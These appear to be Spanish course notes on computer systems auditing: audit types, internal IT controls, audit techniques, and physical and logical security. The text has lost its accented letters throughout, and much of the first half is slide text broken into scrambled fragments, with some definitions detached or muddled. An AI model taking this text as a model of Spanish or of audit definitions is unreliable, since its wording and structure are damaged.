AUDITORA DE SISTEMAS COMPUTACIONALES

La auditora de sistemas computacionales est clasificada como una disciplina.

De las ciencias exactas de la economa y administracin

Auditoria Informtica en Sistemas Computacionales

La auditora informtica es el proceso de:
Recoger,
Agrupar
Evaluar
Evidencias para determinar si un sistema de informacin salvaguarda :
El activo empresarial.
Mantiene la integridad de los datos.
Lleva a cabo eficazmente los fines de la organizacin.
Utiliza eficientemente los recursos.
Cumple con las leyes y regulaciones establecidas.

Orgenes de la Auditora
Se remontan a:
Revisin y Diagnostico de registros de las operaciones contables de una empresa.
Posteriormente Pasamos al:
Anlisis
Verificacin
Evaluacin
De los aspectos financieros.
Posteriormente se amplio el campo de accin a:
Examinar rubros de administracin.
Revisin Integral
Luego se evoluciono a:
Anlisis de aspectos que intervienen en todas las actividades.

Por ltimo:
Se llevo a lo que se conoce como revisin integral de la organizacin

Nacimiento de las Auditoras Computacionales

Se comenz a realizar inspecciones en reas especializadas o especificas y entre todas los
departamentos por clasificarlos de alguna forma y fue como se llego a la :
AUDITORIA DE SISTEMAS COMPUTACIONALES

ANTECEDENTES DE LA AUDITORA
-

Comercio primitivo
Comercio por trueque
Trueque a nivel de aldea
Comercio a nivel ciudad
Comercio a nivel estado
Comercio a nivel continente
Mecanismos rudimentarios de registros
Se da inicio a los gremios
Mercados locales
Comienzan las empresas incipientes
Los escribas toman el control
Aparece la partida doble libro diario
Surge la llamada: tenedura de libros
Esta tcnica evoluciono y llego a llamarse: contabilidad cuyo objetivo es: veracidad y
confiabilidad en los datos
Actualmente la contabilidad se maneja por medios informticos
En este momento nace la necesidad de que alguien evalu estos controles

La Auditora de Sistemas Computacionales

Se apoya en ellas para ejecutar sus revisiones.
Utilizando sus tcnicas y metodologas de evaluacin.

CONCEPTOS BSICOS SOBRE LA AUDITORA

Definicin de Auditora:
Revisin independiente de alguna actividad, funciones especificas, resultados u operaciones
administrativas, realizadas por un profesional, con el propsito de evaluar su correcta realizacin

Y, con base en ese anlisis poder emitir una opinin autorizada sobre las razones de sus
resultados.

Auditor
Persona capacitada para realizar auditoras en una empresa u otras instituciones.
Es la persona que se encarga de revisar los registros, procedimientos y transacciones financieras
de una organizacin hechas por especialistas.
Auditora
LA ACCIN - Supervisin de las cuentas de una empresa, hecha por decisin de un tribunal o
instancia en particular.

CLASIFICACIN DE LOS TIPOS DE AUDITORA

Auditoras por
su lugar de
Aplicacin

Auditora Externa

Auditor no tiene
relacin directa con la
empresa

Auditora Interna

Existe alguna relacin

del auditor con la
empresa

Auditora Financiera

Auditora Administrativa

Auditora Operacional
Auditoras por su rea de
Aplicacin
Auditora Integral

Auditora Gubernamental

Auditora de Sistemas

AUDITORAS ESPECIALIZADAS EN REAS ESPECFICAS

Auditora rea mdica

Auditora por su rea de Aplicacin

Auditora de obras
construcciones
Auditora Fiscal

Auditora de sistemas
computacionales

Auditora Laboral

Auditora Informtica

Auditora Proyectos
de Inversin

Auditora con la computadora

Auditora caja chica o

mayor

Auditora sin la computadora

Auditora inventarios

Auditora a la Gestin Informtica

Auditora ambiental

Auditora al Sistema de Cmputo

Auditora de sistemas

Auditora alrededor de la
computadora
Auditora de la seguridad de sistemas
computacionales
Auditora a los sistemas de redes
Auditora Integral a los centros de
cmputo
Auditora ISO-9000 a los sistemas
computacionales
Auditora Outsourcing
Auditora ergonmica de sistemas
computaciones

AUDITORIA EXTERNA
Permite: Utilizar libre albedrio para;

Principal caracterstica es
que la realizan ajenos
totalmente a la empresa.

Aplicar mtodos tcnicas y

herramientas. Para evaluar las
actividades
El resultado ser absolutamente
independiente.

AUDITORIA EXTERNA

El trabajo es totalmente independiente.

Libre de injerencias de parte de las

autoridades de la empresa auditada.

Ventajas

Por ser empresas especializadas cuenta

con personal con mucha experiencia
La razn: Es que ya utilizaron tcnicas y
herramientas con otras empresas con
caractersticas similares.
Otra es que su dictamen es validado por
autoridades
La mayor es que el auditor conoce poco
empresa.

Depende de los empleados auditados

para realizar su trabajo.

Desventajas

Su evaluacin, alcances pueden ser

limitados.

El ambiente es hostil hacia el auditor.

El costo para el empresa es oneroso.

El auditor labora en la misma empresa

Principal caracterstica

Esto le permite estar involucrado en las

operaciones

AUDITORIA INTERNA

Por su acercamiento a las autoridades de

la empresa su juicio de valor podra verse
afectado
Conoce integralmente las actividades
operaciones reas.
Revisa con mayor profundidad y
conocimiento de las actividades y
problemas de la empresa.

Ventajas

Su informe es interno y es enviado a los

superiores nunca sale de las oficinas.

Al ser parte de la empresa no se consumen

honorarios adicionales

La ms importante es que detectar

problemas y desviaciones a tiempo

Las autoridades pueden influir en sus

informes(injerencia)
Desventajas
Puede experimentar presiones,
compromisos, y hasta ciertos intereses de
algunos pocos.

CLASIFICACIN DE AUDITORAS POR SU REA DE APLICACIN

Auditora Administrativa

Auditora Financiera

Se refiere al mbito especfico donde se llevan a cabo las actividades y operaciones que sern
auditadas, de acuerdo al rea de trabajo e influencia de la rama o especialidad que ser evaluada

Primer tipo de auditora que existi en el mbito comercial.

Este tipo de auditora es la principal actividad del auditor, consiste en
revisar que se haya aplicado los registros contables de forma oportuna
y correcta.

Revisin sistemtica , explorativa y critica. Realizada por un profesional a los

sistemas contables. Con el fin de evaluar la razonabilidad, veracidad,
confiabilidad, y oportunidad en la emisin de los resultados financieros.

Relacin entre integrantes.

Revisin sistemtica y exhaustiva

que se realiza en las actividades
administrativas. En cuanto a:

Cumplimiento de Funciones

Actividades que regulan sus

operaciones

Auditora Operacional

Existencia

Suficiencia

Revisin sistemtica,
exhaustiva y especfica
de las actividades de
una empresa. Evala:

Eficacia

Eficiencia

Correcto desarrollo de operaciones

Auditora Integral

Funciones Administrativas

Revisin exhaustiva,
sistemtica y global
que realiza un equipo
multidisciplinario de
profesionales a todas
las actividades y
operaciones de la
empresa para evaluar:

Resultados Conjuntos

Relaciones de Trabajo

Comunicaciones y Procedimientos

Normas Polticas y Lineamientos sobre los

recursos de la empresa.

Actividades

El propsito
fundamental de este
tipo de auditora tan
especializada es
Auditar de manera
conjunta todas las:

Funciones

Operaciones de todas las reas de la empresa

Auditora Gubernamental

Es la revisin exhaustiva,
sistemtica y concreta que se
realiza a todas las actividades y
operaciones de un ente
gubernamental. Evala:

Correcto desarrollo de funciones en todas

las reas administrativas
Mtodos y procedimientos.
Alcanzar los objetivos de gobierno.

Cual es la razn de ser de esta

auditora si ya exista la auditora
integral.

Haya un aplicacin y cumplimiento del

presupuesto pblico

La integral evoluciono suficientemente

para esta acccin.
Sistemas computacionales
Software
Datos de la empresa
Instalaciones
Revisin tcnica, especializada y
exhaustiva que se realiza a :

Telecomunicaciones

Auditora Informtica

Redes
Mobiliario
Equipos perifricos
Y dems componentes.
Gestin informtica.
Aprovechamiento de recursos.
Esta revisin tambin aplica a la:
Medidas de seguridad
Bienes consumo o suministros

Correcto ingreso de datos.

Propsito Fundamental
Auditora Informtica
Evaluar:

Uso adecuado de los

sistemas para:

Procesamiento adecuado
de la informacin.

Cumplimiento de
funciones

Emisin oportuna de
reportes.

Actividades y operaciones
de empleados
involucrados en los
sistemas computacionales.

Mtodos

Tcnicas
Los avances tecnolgicos
son cada vez ms
singulares y peculiares por
lo que no es suficiente:
Herramientas

Procedimientos

Sistemas computacionales
Revisin tcnica, especializada
y exhaustiva que se realiza a:
Auditora
Informtica

Auditora con
la
computadora

Software
Informacin de la
empresa

Dicho de forma general y

similar a nuestro anterior
concepto y de momento
mientras abordamos todas las
dems.
Es la auditora que se realiza con el apoyo de
los equipos de cmputo y sus programas para
evaluar cualquier tipo de actividades y
operaciones, no necesariamente
computarizadas, pero s susceptibles de ser
automatizadas.
Estructura de la organizacin
Funciones y actividades de
funcionarios

Auditora sin
la
computadora

Es la auditoria cuyos mtodos,

tcnicas y procedimientos estn
orientados nicamente a la
evaluacin tradicional del
comportamiento y validez de las
transacciones econmicas,
administrativas y operacionales
de un rea de cmputo.

Evala:

Personal del centro de cmputo

Perfil de los puestos
Reporte, informes, bitcoras de
los sistemas
Existencia de programas, planes
presupuestos en centro cmputo
Uso y aprovechamiento de los
recursos.

Seguridad y prevencin
Contingencias
Procedimientos para adquirir
nuevo hardware y software
Contratacin de nuevo personal

Planeacin

Se toma de carcter
administrativa y
operacional. Auditora
cuya aplicacin esta
enfocada a:

Direccin

Control de un Centro

Auditora a la Gestin
Informtica

Tambin se utiliza para:

Evaluar el cumplimiento
de las funciones y
actividades del
funcionario empleados
usuarios del rea de
sistemas

Operaciones del sistema

Uso y proteccin de los

sistemas de
procesamiento
Revisa y evala:
Programas e informacin

Mantenimiento y
explotacin de los
sistemas equipos e
instalaciones

Auditoria ms
especializada y
concreta.
Enfocada a la actividad
y operacin de los
sistemas
computacionales.

Aqu se utiliza ms:

Evaluacin tcnica y
especializada.

Funcionamiento y uso
correcto del equipo de
computo.

Auditora en Sistemas
Computacionales

Hardware

Software y perifricos
asociados

Evala:

Arquitectura fsica y
componentes de
hardware

Desarrollo y uso de
software de operacin.

Lenguajes de
desarrollo.

Por ultimo incluye la

operacin del sistema

Auditora alrededor de la
computadora

Es la revisin especfica que

se realiza a todo lo que est
alrededor de un equipo de
cmputo, como son

sus sistemas

actividades

funcionamientos

haciendo una evaluacin

de sus mtodos y
procedimientos.

reas y el personal.

Auditora de la seguridad
de los sistemas
computacionales

Seguridad es uno de los

aspectos ms importantes
en los sistemas
computacionales-

Actividades de los
funcionarios

Revisin exhaustiva,
tcnica y especializada a la
seguridad de un sistema
a:.

Acciones preventivas y
Correctivas que se tengan.

PLANES DE
CONTINGENCIA.

Medidas de proteccin de
la informacin

Arquitectura

Topologa

Auditora a los Sistemas de Redes

Protocolos de
Comunicacin
Conexiones

Accesos
Revisin exhaustiva,
especfica y
especializada que se
realiza a los sistemas
computacionales de
redes de una empresa.

Administracin

Revisa

Instalacin

Privilegios

Funcionalidad

Aprovechamiento
Revisin del software
institucional
Recursos informticos
Informacin de las
operaciones
Bases de datos
compartidas
Software y Hardware de
la red

Auditora Integral a los centros de cmputo

Uso adecuado de los sistemas de cmputo.

Es la revisin
exhaustiva,
sistemtica y global
que se realiza por
medio de un
equipo
multidisciplinario
de auditores, de
todas las
actividades y
operaciones de un
centro
sistematizacin.

Equipos Perifricos.
Apoyo para el procesamiento de informacin
de la empresa.
Red de servicio de la empresa
Desarrollo correcto de las funciones de sus
reas, personal y usuarios.
Administracin del sistema.
Manejo y control de sistemas operativos.
Lenguajes.

Se Evalua
Programas.
Software de aplicacin.
Administracin y control de proyectos
Adquisicin de hardware y software
las normas
Administracin y control de proyectos.
polticas
Integracin y uso de los recursos informticos.
estndares
Existencia y cumplimiento de
procedimientos del
sistema
personal
usuarios del centro
de cmputo.

Revisin exhaustiva,
sistemtica y
especializada que
realizan nicamente
los auditores
especializados y
certificados en las
normas y
procedimientos ISO9000

Auditora ISO-9000 a los

Sistemas
Computacionales

Evaluar
Dictaminar

Auditora Outsourcing

El propsito
fundamental de esta
revisin es:

Revisin exhaustiva,
sistemtica y
especializada que se
realiza para evaluar la
calidad en el servicio de
asesora o
procesamiento externo
de informacin que
proporciona una
empresa.

Objetivo

Certificar
Que la calidad de los
sistemas
computacionales se
apegue a los
requerimientos del ISO9000

Revisar confiabilidad.

Oportunidad.

Suficiencia.
Asesora de los prestadores del
servicio.
Cumplimiento de las funciones y
actividades.

Calidad

Es la revisin tcnica,
especfica y
especializada que se
realiza para evaluar :

Eficiencia

Utilidad del entorno

hombre-maquina-medio
ambiente.
Correcta adquisicin y uso
de mobiliario y equipo y
sistemas.

Auditora Ergonmica
de Sistemas
Computacionales

evalua

Bienestar confort
comodidad que necesita un
usuario.
Deteccin de problemas y
repercusiones con la salud
fsica y bienestar del
usuario.
Realizar una revisin
independiente

Hacer una revisin

especializada
Objetivos
Evaluar el cumplimiento de
planes

Evaluar el cumplimiento de
planes

SIMILITUDES Y DIFERENCIAS EN LA AUDITORIA INTERNA Y EXTERNA

CONTROL INTERNO INFORMTICO
SIMILITUDES

AUDITOR INFORMTICO

PERSONAL INTERNO
Conocimientos especializados en tecnologas de informacin verificacin
del cumplimiento de controles internos, normativa y procedimientos
establecidos por la direccin informtica y la direccin general para los
sistemas de informacin.

DIFERENCIAS

Anlisis de los controles en el da a da. Anlisis de un momento

informtico determinado. Informa
Informa a la direccin del
a la direccin general de la
departamento de informtica.
organizacin.
Slo personal interno.
Personal interno y/o externo.
El enlace de sus funciones es
Tiene cobertura sobre todos los
nicamente sobre el departamento de
componentes de los sistemas de
informtica.
informacin de la organizacin.

Elementos fundamentales del control interno informtico

CONTROLES INTERNOS SOBRE LA ORGANIZACIN DEL REA DE INFORMTICA
-

Direccin
Divisin del trabajo
Asignacin de responsabilidad y autoridad
Establecimiento de estndares y Mtodos
Perfiles de puestos

CONTROLES INTERNOS SOBRE EL ANLISIS, DESARROLLO E IMPELEMENTACIN DE SISTEMAS

-

Estandarizacin de metodologas para el desarrollo de proyectos

Elaborar estudios de factibilidad del sistema
Garantiza la eficiencia y eficacia en el anlisis y diseo de sistemas
Vigilar la efectividad y eficiencia en la implementacin y mantenimiento del sistema
Optimizar el uso del sistema por medio de su documentacin

CONTROLES INTERNOS SOBRE LA OPERACIN DEL SISTEMA

-

Prevenir y corregir los errores de operacin

Prevenir y evitar la manipulacin fraudulenta de la informacin
Implementar y mantener la seguridad en la operacin

Mantener la confiabilidad, oportunidad, veracidad y suficiencia en el procesamiento de la

informacin

CONTROLES INTERNOS SOBRE LOS PROCEDIMIENTOS DE ENTRADA DE DATOS, EL

PROCESAMIENTO DE INFORMACIN Y LA EMISIN DE RESULTADOS
-

Verificar existencia de procedimientos de captura de datos

Comprobar que todos los datos sean procesados
Verificar confiabilidad, veracidad y exactitud en el procesamiento de datos
Comprobar la oportunidad, confiabilidad y veracidad en la emisin de reportes del
procesamiento de informacin

CONTROLES INTERNOS SOBRE LA SEGURIDAD DEL AREA DE SISTEMAS

-

Controles para prevenir y evitar amenazas, riesgos y contingencias que puedan incidir en los
sistemas.
Controles sobre la seguridad fsica del rea de sistemas
Controles sobre la seguridad lgica de los sistemas
Controles sobre la seguridad de las bases de datos
Controles sobre la seguridad de los sistemas computacionales
Controles sobre la seguridad del personal de informtica
Controles sobre la seguridad de las telecomunicaciones de informtica
Controles sobre la seguridad de las redes

LAS SIETE FASES DE SDLC

-

Identificacin de problemas, oportunidades y objetivos

Determinacin de los requerimientos de informacin
Anlisis de necesidades de sistema
Diseo del sistema recomendado
Desarrollo y documentacin del software
Pruebas y mantenimiento del software
Implementacin y evaluacin del sistema

AUDITORA INFORMTICA
-

Regular Informtica:
o Se refiere a la calidad de la informacin existente en las bases de datos de los
sistemas informticos que se utilizan para controlar los recursos, su entorno y los
riesgos asociados a esta actividad.
Especial Informtica:
o El anlisis de los aspectos especficos relativos a las bases de datos de los sistemas
informticos en que se haya detectado algn tipo de alteracin o incorrecta
operatoria de los mismos.
Recurrente Informtica:

o Se examina los Planes de Medidas elaborados en auditoras informticas anteriores

donde se obtuvo la calificacin de Deficiente o Malo, ya sea en una Regular o
Especial.
Auditora Informtica
Es una disciplina incluida en el campo de la auditora y es el anlisis de las condiciones de una
instalacin informtica por un auditor externo e independiente que realiza un dictamen sobre
diferentes aspectos.
Auditora Informtica se puede definir como el conjunto de procedimientos y tcnicas para
evaluar y controlar un sistema informtico con el fin de constatar si sus actividades son correctas
y de acuerdo a las normativas informticas y generales en la empresa.
La Auditora Informtica a ms de la evaluacin de los computadores, de un sistema o
procedimiento especfico, habr de evaluar los sistemas de informacin en general desde sus
entradas, procedimientos, controles, obtencin de informacin, archivos y seguridad. Siendo de
vital importancia para el buen desempeo de los sistemas de informacin, ya que proporciona los
controles necesarios para que los sistemas sean confiables y con un buen nivel de seguridad.
Adems debe evaluar todo: Informtica, organizacin de centros de informacin, hardware y
software, el auditor informtico ha de velar por la correcta utilizacin de los amplios recursos que
la empresa pone en juego para disponer de un eficiente y eficaz sistema de Informacin.
Las fases ms importantes en el desarrollo de la auditora informtica son las siguientes:
-

Toma de Contacto
Validacin de la Informacin
Desarrollo de la Auditora
Fase de Diagnstico
Presentacin de Conclusiones
Formacin del Plan de Mejoras (Recomendaciones).

Tcnicas o herramientas usadas por la Auditora Informtica

Cuestionarios
La informacin recopilada es muy importante, y esto se consigue con el levantamiento de
informacin y documentacin de todo tipo. Los resultados que arroje una auditora se ven
reflejados en los informes finales que estos emitan y su capacidad para el anlisis de situaciones
de debilidades o de fortalezas que se dan en los diversos ambientes. El denominado trabajo de
campo consiste en que el auditor busca por medio de cuestionarios recabar informacin
necesaria para ser discernida y emitir finalmente un juicio global objetivo, los que deben ser
sustentados por hechos demostrables, a quienes se les llama evidencias.

Esto se puede conseguir, solicitando el cumplimiento del desarrollo de formularios o cuestionarios

lo que son preimpresos, los cuales son dirigidas a las personas que el auditor considera ms
indicadas, no existe la obligacin de que estas personas sean las responsables de dichas reas a
auditar.
Cada cuestionario es diferente y muy especfico para cada rea, adems deben ser elaborados con
mucho cuidado tomando en cuenta el fondo y la forma. De la informacin que ha sido analizada
cuidadosamente, se elaborar otra informacin la cual ser emitida por el propio Auditor. Estas
informaciones sern cruzadas, lo que viene a ser uno de los pilares de la auditora.
Muchas veces el auditor logra recopilar la informacin por otros medios, y que estos preimpresos
podan haber proporcionado, cuando se da este caso, se puede omitir esta primera fase de la
auditora

Entrevistas
Tres formas existentes hacen que el auditor logre relacionarse con el personal auditado.
-

La solicitud de la informacin requerida, esta debe ser concreta y debe ser de la materia de
responsabilidad del auditado.
En la entrevista no se sigue un plan predeterminado ni un mtodo estricto de sometimiento
a un cuestionario.
La entrevista es un medio por el que el auditor usar metodologas las que han sido
establecidas previamente con la finalidad de encontrar informacin concreta.

La importancia que la entrevista tiene en la auditora se debe a que la informacin que recoge es
mayor, se encuentra mejor elaborada, y es ms concreta que las que pueden proporcionar los
medios tcnicos, o los cuestionarios. La entrevista personal entre el auditor y el personal
auditado, es basada en una serie de preguntas especficas en las que el auditado deber
responder directamente.

Checklist
El uso del Checklist goza de opiniones compartidas, debido a que descalifica en cierta forma al
auditor informtico, ya que al hacer uso de este tipo de cuestionarios el auditor incurre en la falta
de profesionalismo. Por eso es mejor que se de un procesamiento de la informacin a fin de
llegar a respuestas que tengan coherencia y as poder definir correctamente los puntos ms
dbiles y los ms fuertes; el profesionalismo del auditor se refleja en la elaboracin de preguntas
muy bien analizadas, las mismas que se hacen de forma no muy rigurosa.

Estos cuestionarios deben ser contestados oralmente, ya que superan en riqueza a cualquier otra
forma de obtencin de informacin.
El personal auditado generalmente se encuentra familiarizado con el perfil tcnico y lo percibe
fcilmente, as como los conocimientos del auditor. De acuerdo a esta percepcin denota el
respeto y el prestigio que debe poseer el auditor.
Por ello es muy importante tener elaboradas las listas de preguntas, pero an es mucho ms
importante la forma y el orden en que estas se formulan, ya que no serviran de mucho si es que
no se desarrollan oportuna y adecuadamente.
Puede ser que alguna pregunta deba repetirse, pero en este caso deber ser formulada en forma
diferente, o su equivalencia. Con la ayuda de este mtodo los puntos contradictorios sern
notorios de forma ms rpida. Cuando se dan casos en los que existe contradiccin, entonces se
har una reelaboracin de preguntas para complementar a las formuladas previamente y as
poder conseguir consistencia.
Estos Checklist responden a dos tipos de razonamiento para su calificacin o evaluacin:
-

Checklist de rango: contendr preguntas que se harn dentro de los parmetros

establecidos, por ejemplo, de 1 a 5, siendo 1 la respuesta ms negativa y 5 la ms positiva.
Checklist Binario: preguntas que son formuladas con respuesta nica y excluyente, Si o No;
verdadero o falso.

Tipos de Auditoras Informticas

Los objetivos generales de la Auditora Informtica cambian dependiendo de las tareas que tiene
que verificar o controlar, por ejemplo:
-

En la Auditora de Sistemas tendr que controlar la interfaz de usuario, la documentacin de

la aplicacin.
En la Auditora Ofimtica (dentro de la Auditora de Sistemas) tendr que controlar la
instalacin de la aplicacin, el movimiento de la informacin.
En la Auditora de Redes tendr que controlar la conexin entre los computadores, la
instalacin del software para la red.
En la Auditora para la Administracin de las Bases de Datos tendr que controlar la
integridad de los datos, la concurrencia a la Base de Datos.
En la Auditora en Tecnologas Internet tendr que controlar las ventajas de portabilidad de
las aplicaciones del lado del cliente, la accesibilidad desde diferentes dispositivos
(diferentes sistemas operativos, celulares, palm, etc.).

Debido a los diferentes tipos de auditora informtica el auditor debe conocer bien el rea que va
a auditar y slo de esta forma podr realizar un buen trabajo; esto quiere decir que si el Auditor va
a realizar una Auditora de Redes el tendr que ser especialista de Redes o por lo menos conocer

muy bien el manejo y funcionamiento de las redes e incluso entre diferentes Sistemas Operativos
y as con todos los tipos de Auditoras

Seguridad Informtica:
La seguridad permite garantizar que los recursos informticos de una compaa estn disponibles
para cumplir sus propsitos, es decir, que no estn daados o alterados por circunstancias o
factores externos, es una definicin til para conocer lo que implica el concepto de seguridad
informtica. Entendindose como peligro o dao todo aquello que pueda afectar su
funcionamiento directo o los resultados que se obtienen del mismo.
La seguridad es un tema muy importante para cualquier empresa, este o no conectada a una red
pblica. Los niveles de seguridad que se pueden implementar son muchos y depender del usuario
hasta donde quiera llegar.
La seguridad informtica y de datos en una empresa dista mucho de simplemente tener un
Firewall. Se aborda un proceso de seguridad recomendado a utilizar por lo menos las siguientes
herramientas:
-

Un firewall o combinacin de ellos.

Proxies.
Un sistema de deteccin de intrusos o IDS.
Sistemas de actualizacin automtica de software.
Sistemas de control de la integridad de los servidores, paquetes, etc.
Un sistema de administracin y control para monitorear la seguridad.

Segn expertos hasta hoy en da todava no se ha creado un sistema que sea 100% seguro y
explican que un sistema se puede definir como seguro cuando tiene las tres caractersticas
principales como son: Integridad (Autorizacin para que la informacin sea modificada),
Confidencialidad (Informacin asequible para autorizados), Disponibilidad (Disponible solo cuando
se necesite).
En otras palabras la seguridad puede entenderse como aquellas reglas tcnicas o actividades
destinadas a prevenir, proteger y resguardar lo que es considerado como susceptible de robo,
prdida o dao, ya sea de manera personal, grupal o empresarial.
En este sentido, es la informacin el elemento principal a proteger, resguardar y recuperar dentro
de las redes empresariales.
La seguridad informtica de una empresa es primordial debido a la existencia de personas ajenas a
la informacin (hackers), quienes buscan la mnima oportunidad para acceder a la red, modificar,
borrar datos o tomar informacin que puede ser de vital importancia para la empresa.
Tales personajes pueden, incluso, formar parte del personal administrativo o de sistemas, de
cualquier compaa; de acuerdo con expertos en el rea, ms de 70% de las violaciones a los
recursos informticos se realiza por el personal interno, debido a que ste conoce los procesos,

metodologas o tiene acceso a la informacin sensible de la empresa que puede afectar el buen
funcionamiento de la organizacin, pudiendo representar un dao con valor de miles o millones
de dlares.
En el momento de instalar un sistema y haber invertido con mecanismos de seguridad, se debera
plantear la pregunta: cul debe ser el nivel de seguridad de la empresa? La respuesta va a
depender de la importancia que tenga la informacin y los recursos que compongan el sistema. De
tal forma que se necesite asegurar pero no ser lo mismo con un sistema informtico bancario,
que con los que contengan informacin que afecte a la seguridad del estado, o que aquellos
destinados al desarrollo de aplicaciones informticas comerciales, o simples programas para
computadores personales del hogar.
Se debe establecer polticas de seguridad como un factor importante para la empresa, pudiendo
ser el monitoreo de la red, los enlaces de telecomunicaciones, respaldar datos, para establecer los
niveles de proteccin de los recursos.
Es recomendable que las polticas se basen en los siguientes puntos:
-

Identificar y seleccionar la informacin sensible (que se debe proteger).

Establecer niveles de importancia en la informacin.
Dar a conocer los resultados que traera a la organizacin, si se llegase a perder la
informacin importante. Referente a costos y productividad.
Identificar los niveles de vulnerabilidad de la red y las amenazas que tiene al tener una red
mal estructurada.
Realizar un anlisis de los costos para prevenir y recuperar la informacin en el caso de
sufrir un ataque.
Implementar respuesta a incidentes y recuperacin para disminuir el impacto.

Las polticas detalladas permitirn desplegar un diseo de la seguridad basada en soluciones

tcnicas, as como el desarrollo de un plan de contingencias para manejar los incidentes y
disminuir el impacto que estas causaran.

SEGURIDAD FSICA
Es muy importante ser consciente que por ms que la empresa sea la ms segura desde el punto
de vista de ataques externos, Hackers, virus, etc.; la seguridad de la misma ser nula si no se ha
previsto como combatir un incendio o algn tipo de desastre natural.
La seguridad fsica es uno de los aspectos ms olvidados a la hora del diseo de un sistema
informtico. La Seguridad Fsica consiste en la aplicacin de barreras fsicas y procedimientos de
control, como medidas de prevencin y contramedidas ante amenazas a los recursos e
informacin confidencial. Refirindose de esta manera a los controles y mecanismos de seguridad
dentro y alrededor del Centro de Cmputo as como los medios de acceso remoto; implementado
para proteger el hardware y medios de almacenamiento de datos.

TIPOS DE DESASTRES
Este tipo de seguridad est enfocado a cubrir las amenazas ocasionadas tanto por el hombre como
por la naturaleza del medio fsico en que se encuentra ubicada la seccin de procesamiento de
datos.
Las principales amenazas que se prevn en la seguridad fsica son:
-

Desastres naturales, incendios accidentales tormentas e inundaciones.

Amenazas ocasionadas por el hombre.
Disturbios, sabotajes internos y externos deliberados.

A veces basta recurrir al sentido comn para darse cuenta que cerrar una puerta con llave o
cortar la electricidad en ciertas reas siguen siendo tcnicas vlidas en cualquier entorno.
A continuacin se analizan los peligros ms importantes que se corren en un centro de
procesamiento; con el objetivo de mantener una serie de acciones a seguir en forma eficaz y
oportuna para la prevencin, reduccin, recuperacin y correccin de los diferentes tipos de
riesgos.
-

Incendios
Inundaciones
Condiciones Climatolgicas
Instalaciones Elctricas

Acciones Hostiles
-

Robo
Fraude
Sabotaje

SEGURIDAD LGICA
Luego de ver como nuestro sistema puede verse afectado por la falta de Seguridad Fsica, es
importante recalcar que la mayora de los daos que puede sufrir un centro de cmputo no ser
sobre los medios fsicos sino contra informacin almacenada y procesada.
El activo ms importante que se posee una empresa es la informacin, y por lo tanto deben existir
tcnicas, ms all de la seguridad fsica, que la aseguren. Estas tcnicas las brinda la Seguridad
Lgica.
Es decir que la Seguridad Lgica consiste en la aplicacin de barreras y procedimientos que
resguarden el acceso a los datos y slo se permita acceder a ellos a las personas autorizadas para
hacerlo.
Los objetivos que plantean este tipo de seguridades son:

Restringir el acceso a los programas y archivos.

Asegurar que los operadores puedan trabajar sin una supervisin minuciosa y no puedan
modificar los programas ni los archivos que no correspondan.
Asegurar que se estn utilizados los datos, archivos y programas correctos.
Que la informacin transmitida sea recibida slo por el destinatario al cual ha sido enviada y
no a otro.
Que la informacin recibida sea la misma que ha sido transmitida.
Que existan sistemas alternativos secundarios de transmisin entre diferentes puntos.
Que se disponga de pasos alternativos de emergencia para la transmisin de informacin.

CONTROL DE SISTEMAS E INFORMTICA

El control de sistemas e informtica consiste en examinar los recursos, las operaciones, los
beneficios y los gastos de las producciones, de los organismos sujetos a control, con la finalidad de
evaluar la eficacia y eficiencia Administrativa, Tcnica y Operacional. Asimismo de los Sistemas
(Planes, Programas y Presupuestos, Diseo, Software, Hardware, Seguridad, Respaldos y otros)
adoptados por la empresa.
Existe otra definicin sobre el "control tcnico" en materia de Sistemas e Informtica, y esta se
orienta a la revisin del Diseo de los Planes, Diseos de los Sistemas, la demostracin de su
eficacia, Pruebas de Productividad de Gestin, el anlisis de resultados, niveles y medios de
seguridad, respaldo, y el almacenamiento.
Los controles pueden ser de dos tipos: control visual que permiten eliminar muchos riesgos de
forma sencilla, y los controles de validez que se basan en estadsticas que indican posibles riesgos
inminentes, de tal forma que se pueda prevenir. Un control es una muestra de acciones
ejecutadas su funcin es establecer, ejecutar, modificar y mantener actividades de control de
modo que la fiabilidad global del sistema sea aceptable.
Se detallan algunos de los controles ms importantes:
1. Controles de autenticidad: Para verificar la identidad de un usuario que quiera tomar
alguna accin en el sistema, como passwords, nmeros de identificacin personal.
2. Controles de precisin: Para asegurar la correccin de la informacin y procesos en el
sistema, como un programa o rutina que controle el tipo de dato ingresado.
3. Controles de completitud: Asegurarse de que no hay prdida de informacin y que todo
proceso se concluya adecuadamente, como revisar que no haya dos campos vacos.
4. Controles de redundancia: Para asegurar que la informacin es procesada una sola vez.
5. Controles de privacidad: Impedir que usuarios no autorizados accedan a informacin
protegida.
6. Controles de auditora: Tratar de asegurar que queden registrados cronolgicamente todos
los eventos que ocurren en el sistema. Este registro es muy importante para responder

preguntas, determinar irregularidades, detectar las consecuencias de un error. Deben

mantenerse dos tipos de auditora, la auditora de cuentas y la auditora de operaciones.
7. Controles de existencia: Asegurar la disponibilidad continua de todos los recursos y datos
del sistema.
8. Controles de salvaguarda de activos: Para asegurar que todos los recursos dentro del
sistema estn protegidos de la destruccin o corrupcin.
9. Controles de eficacia: Asegurar que el sistema alcanza sus objetivos.
10. Controles de eficiencia: Asegurar que el sistema utiliza el mnimo nmero de recursos para
conseguir sus objetivos.
Estos tipos de control no son mutuamente excluyentes. Un control puede participar en varias
categoras.
Al evaluarse los efectos de un control sobre la fiabilidad de un componente, se consideran varios
atributos del control:
-

La bsqueda del tipo de control adecuado, dada la naturaleza del proceso de actividades
depende del sistema. Adems algunas veces el controlar algn tipo de error o irregularidad
es mucho ms caro que las prdidas que estos producen.
Un atributo a considerar cuando se evala la efectividad del control es si el control
previene, detecta o corrige errores.
Otro atributo a tener en cuenta es el nmero de componentes necesarios para realizar el
control.
Finalmente han de considerarse el nmero de subsistemas afectados por el control. Esta
funcin comprueba si se trata de un componente compartido, es decir, que realiza
actividades en varios subsistemas.

El auditor se preocupa en conseguir que los sistemas se encuentren en total operatividad, para
lograr esto se deben realizar una serie de Controles Tcnicos Generales de Operatividad, y dentro
de ellos unos Controles Tcnicos Especficos de Operatividad, los que deben estar desarrollados
previamente.

CONTROLES TCNICOS GENERALES

Estos controles verifican la compatibilidad entre el Sistema Operativo y el Software de base con
todos los subsistemas existentes, as como la compatibilidad entre el Hardware y el Software
instalado. La importancia de estos controles en las instalaciones se da debido a que como existen
entornos de trabajo muy diferenciados se obliga a contratar diferentes productos de software
bsico, existiendo el riesgo de que se pueda desaprovechar parte del software que ha sido
adquirido. Existe la posibilidad de que cada Centro de Procesamiento de Datos sea operativo
